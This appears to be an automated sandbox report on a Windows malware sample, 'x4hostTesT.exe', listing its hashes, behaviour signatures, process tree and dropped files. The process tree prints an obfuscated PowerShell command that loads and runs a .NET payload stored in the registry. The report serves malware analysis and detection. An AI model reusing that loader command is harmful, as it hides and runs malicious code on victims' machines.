Analysis
-
max time kernel
30s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
-
submitted
15-07-2024 09:05
General
-
Target
x4hostTesT.exe
-
Size
748KB
-
MD5
41c2809934950af9e2634aa54cbffe17
-
SHA1
680229680df803f57b469f1131523405bc69682e
-
SHA256
b4d7cdcabead94586770c0a211fe3083419ae2856422bade3e5e2d30611e5660
-
SHA512
72c38ce481db3f2cb97e34247a2e556f80e5b0d2a48d5c83b9138cb1ce2b81f09425a1537fd52adacf4de67b46ccb24433d76fe5f3145e6fd12151164dbd3cc9
-
SSDEEP
12288:Fmj33G0OKtrxdx6TOVVPatXNFiRuOSBXWfIA6xlca+Wx5Ru7xC7Jm3wkCbK2m1XO:AjG0OKtrYTcitoBSwfITxearx55JmAZL
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Executes dropped EXE 9 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 10 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
-
Suspicious use of WriteProcessMemory 47 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{59bc17d2-c451-49cd-97ba-5392e8e8c023}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {10CA562B-5AD0-46DC-9178-47E2372DDE47} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+[Char](87)+''+'A'+''+'R'+''+'E'+'').GetValue(''+[Char](120)+'4st'+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R3⤵
- Drops file in System32 directory
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
-
C:\Windows\System32\alg.exeC:\Windows\System32\alg.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"2⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE"C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE" /auditservice2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE"2⤵
- Executes dropped EXE
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\x4hostTesT.exe"C:\Users\Admin\AppData\Local\Temp\x4hostTesT.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\x4Shellcode.exe"C:\Users\Admin\AppData\Roaming\x4Shellcode.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2047357817-1897437521461653465123421198716723258797660189571691489627-341714110"1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
706KB
MD53cae9498029338b0cd267fbd2a7f748a
SHA17b3215373c833210521d9ff0946241b4b4c1e895
SHA256a6c53d7cba9116fc86d685ce0c4adc4657824f79ba308dc96bdac55269678cd0
SHA5121e26ed7821f32b4a3e7e73992892d3804d471ac2e66d171f8ac13b1516125fdff3d64e1b88c6d4201ec69e5ff46fe9c222f70f9e9a656a2d30d5a46b63fefbde
-
Filesize
30.1MB
MD545ce1773e970f9df53898b34a6e7f404
SHA18d663608907d39a188cddf04f4fbe2376a954815
SHA256c009074590c4f0fb9ecbf941fd51ee63a2e70196cd1913bc8fa0e6e1cb0f7fd0
SHA5122c758ae420bb6ef71174e19679a4dddc9110b914e58d4eef54d47c1bde9e2d66f4de164f0634796ddd4d66f099971418c5d9966d5a854aff6586712875071e49
-
Filesize
781KB
MD54d8fa444afa7c2ec1da87b227b736afd
SHA19d803b9bcea9163e6f543fe1aec283804e94b9ee
SHA256de9256ea143f1f7d8c6373562523cfb1a06d172aa004f2441e95c46da75c83ca
SHA512baf6b5f933fb8a6a3ba9a86632b02598be77f5ccd83eb98eed94059cdf7ea0ebe9e077d0f3b2de854024334d2c2d50ba1dddaa503e1454a2fa5b2c94be36af2e
-
Filesize
2.1MB
MD58fc6e227d4d8cd2f4e2f530dae198d04
SHA139af5fa845764c70ee5a923b2e7dddd6c8820ef7
SHA2561a505ac20eed4340984ecb29390e5f439c6349b3d6fa07bc3f87e49c47125978
SHA51201fd6098ea8ee78b9cc5d8ff162bdf9068db32f1333e05dc2dbbe1ece39e9c9af987eb138cb0bc452e108b87139b3a51db6a3c21f736bdaccd97f35fe645cf96
-
Filesize
731KB
MD5851be4e85b0f111883680e87099483a3
SHA1155e19ad0d2ec4bef3ba25512b6e8bc403350ec9
SHA256ba2d2058ab95d39a9c05c9c74dfa7c860cc662f33ecd96c35f2c344666472197
SHA512bcfd99df20ba3e713801f9c41bc924379f4f6078703ec1d44e90ec3649aa1b2fce6ce802a71a0297516ccf344c627c91359434b7166d716dea69ab41c1fecce6
-
Filesize
678KB
MD5c0a94438345720d86c6a8b0127d56659
SHA1091f2757f322f1c9b6e455894f4cce02806de4c4
SHA2569e1ec3f809d592c92091e4a43040b2bb5aab7c485df4f028adf309c1fd9c0910
SHA512a6078ca29946cae971e653752660233a0fba3abf03394c3e4c9e128320a75800ccbbda994cf877ca35ac7cce78ab8780773bcb0d29664a6d842c1702cc01da38
-
Filesize
656KB
MD5a8559c9dc6b2e43ff262ca44340934b2
SHA148ea64a45fd7a6b4b163995bfacfb433bc07106c
SHA256d63e0479ef3ce94b57b6010ac6fe0e7eda1d5792771554a6f2af9d0187bf0876
SHA5124eaaf12794d6eb40012062169e1c1adea9a530b264bdbba4f51d0b89452f159c6bd3c5f87923349182f195f3cd1b3953c78d73cc816b2c59f3cc2e46b5804ac0
-
Filesize
644KB
MD56b2742474a30a16657d5e2ded83994ef
SHA141ad51ae0837ef44ed3bd316419fdd79e16f5431
SHA256cc3a004ae405f7c992e9d2330b438022b874b901497c1ac38bd80e7c59851903
SHA51294b80639ef1ecc015a6de749a5c740f96e93a31a8d52fbb79e1cff391bd35e55f8e90c9bfa894ebe5f36b050b5cf1aef8553e48014f440e9cb3fb20a8da1d679
-
Filesize
808KB
-
Filesize
384KB
-
Filesize
384KB
-
Filesize
384KB
-
Filesize
808KB
-
Filesize
30.1MB
-
Filesize
412KB
-
Filesize
30.1MB
-
Filesize
412KB
-
Filesize
384KB
-
Filesize
656KB
-
Filesize
656KB
-
Filesize
384KB
-
Filesize
384KB
-
Filesize
384KB
-
Filesize
384KB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
412KB
-
Filesize
740KB
-
Filesize
740KB
-
Filesize
412KB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
168KB
-
Filesize
672KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
672KB
-
Filesize
384KB
-
Filesize
696KB
-
Filesize
384KB
-
Filesize
696KB
-
Filesize
724KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
724KB
-
Filesize
4KB
-
Filesize
776KB